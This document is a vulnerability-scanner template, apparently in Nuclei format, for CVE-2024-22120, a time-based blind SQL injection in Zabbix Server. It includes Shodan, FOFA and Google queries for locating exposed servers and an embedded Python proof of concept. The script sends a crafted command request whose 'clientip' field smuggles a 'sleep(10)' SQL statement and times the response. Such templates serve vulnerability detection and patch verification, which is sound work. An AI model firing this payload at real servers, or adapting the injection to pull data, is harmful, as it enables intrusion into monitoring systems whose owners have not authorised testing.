The Zabbix server can execute commands for configured scripts. After executing a command, an audit entry is added to the "Audit Log". Due to the "clientip" field not being sanitized, it is possible to inject SQL into "clientip" and exploit a time-based blind SQL injection vulnerability.
PoC代码[已公开]
id: CVE-2024-22120
info:
name: Zabbix Server - Time-Based Blind SQL injection
author: CodeStuffBreakThings
severity: critical
description: |
The Zabbix server can execute commands for configured scripts. After executing a command, an audit entry is added to the "Audit Log". Due to the "clientip" field not being sanitized, it is possible to inject SQL into "clientip" and exploit a time-based blind SQL injection vulnerability.
remediation: |
Fixed in versions 6.0.28rc1, 6.4.13rc1, 7.0.0beta2
reference:
- https://support.zabbix.com/browse/ZBX-24505#/
- https://github.com/W01fh4cker/CVE-2024-22120-RCE
- https://nvd.nist.gov/vuln/detail/CVE-2024-22120
- https://support.zabbix.com/browse/ZBX-24505
- https://github.com/AboSteam/POPC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.1
cve-id: CVE-2024-22120
cwe-id: CWE-20
epss-score: 0.93769
epss-percentile: 0.99853
metadata:
max-request: 1
vendor: zabbix
product: zabbix
shodan-query:
- http.title:"zabbix-server"
- cpe:"cpe:2.3:a:zabbix:zabbix"
- http.favicon.hash:"892542951"
fofa-query:
- icon_hash=892542951
- app="zabbix-监控系统" && body="saml"
- title="zabbix-server"
google-query: intitle:"zabbix-server"
tags: cve,cve2024,authenticated,zabbix,sqli,vkev
variables:
HOST: "{{Host}}"
PORT: "{{Port}}"
SID: "{{SID}}"
HOSTID: "{{HOSTID}}"
code:
- engine:
- py
- python3
source: |
import os, struct, socket
from datetime import datetime
hostname=os.getenv('HOST')
port=int(os.getenv('PORT'))
sid=os.getenv('SID')
hostid=os.getenv('HOSTID')
zbx_header = "ZBXD\x01".encode()
message_json = "{\"request\": \"command\", \"sid\": \"" + sid + "\", \"scriptid\": \"3\", \"clientip\": \"' + (select sleep(10)) + '\", \"hostid\": \"" + hostid + "\"}"
message_length = struct.pack('<q', len(message_json))
message = zbx_header + message_length + message_json.encode()
before_query = datetime.now().timestamp()
s = socket.socket()
s.connect((hostname,port))
s.send(message)
response = s.recv(1024)
s.close()
after_query = datetime.now().timestamp()
responsetime = after_query - before_query
if responsetime >= 10 and zbx_header in response:
print("Vulnerable to CVE-2024-22120")
matchers:
- type: word
words:
- "Vulnerable to CVE-2024-22120"
# digest: 4a0a00473045022040b3e9129980c4da25dc8824cec47d716aa03d6aa233cc40f11389b50a8e2df8022100e63e625c6f82e99f692ab5875d43b4c7c7251480ad0b23cedb2647240638d75d:922c64590222798bb761d5b6d8e72950